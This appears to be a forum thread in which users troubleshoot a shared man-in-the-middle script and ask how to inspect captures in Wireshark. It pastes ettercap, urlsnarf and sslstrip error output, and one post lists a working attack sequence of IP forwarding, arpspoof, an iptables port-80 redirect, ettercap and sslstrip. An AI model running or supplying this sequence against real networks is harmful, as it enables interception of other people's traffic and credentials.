how can i get the information using wireshark? is there any tutorial for this? any video? thanks
Printable View
how can i get the information using wireshark? is there any tutorial for this? any video? thanks
thanks for the script
im connected via ethernet to a lan and i tried executing the script but it doesnt work because its not associated.
PHP Code:Dissector "dns" not supported (etter.conf line 70)
urlsnarf: listening on eth1 [tcp port 80 or port 8080 or port 3128]
Listening on eth1... (Ethernet)
ERROR : 99, Cannot assign requested address
[ec_capture.c:get_hw_info:405]
eth1: no IPv4 address assigned
./anything.sh: line 23: stcpxtract: command not found
./anything.sh: line 24: awireshark: command not found
python: no process found
./anything.sh: line 26: 2798 Terminated sslstrip -p -k -w /root/$SESSION/$SESSION.log
etterlog NG-0.7.3 copyright 2001-2004 ALoR & NaGA
Log file version : NG-0.7.3
Timestamp : Mon Mar 21 09:54:18 2011
Type : LOG_INFO
Hi, first of al i wanted to say that i really apreciate your script, thanks.
I wanted to ask for your help, everything on the script seems to run smoothly but somehow sslstrip is not preventing the machine im testing with to load the https. I have tried to do it manually with this comands:
echo 1 > /proc/sys/net/ipv4/ip_forward
arpspoof -i wlan0 192.168.1.6
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
ettercap -T -q -i wlan0
sslstrip -a -k -f
ettercap -T -q -i wlan0
based on g0tm1lks guide while doing that i didin't uncoment the ip tables section in the etter.conf file, and it seems to work however, the computer won't load the https pages at all.
Thanks on advance for your time.
ps: excuse me if my english is rough but it is not my mother language.
I don't know if this has anything to do?
SSL dissection needs a valid 'redir_command_on' script in the etter.conf file
Privileges dropped to UID 0 GID 0
Hey tedbear I wanted to ask you if i can use your script in my blog all credit will go straight to you . Reason why I'm asking you here because the PM's are down for some reason.
enc0de.blogspot.com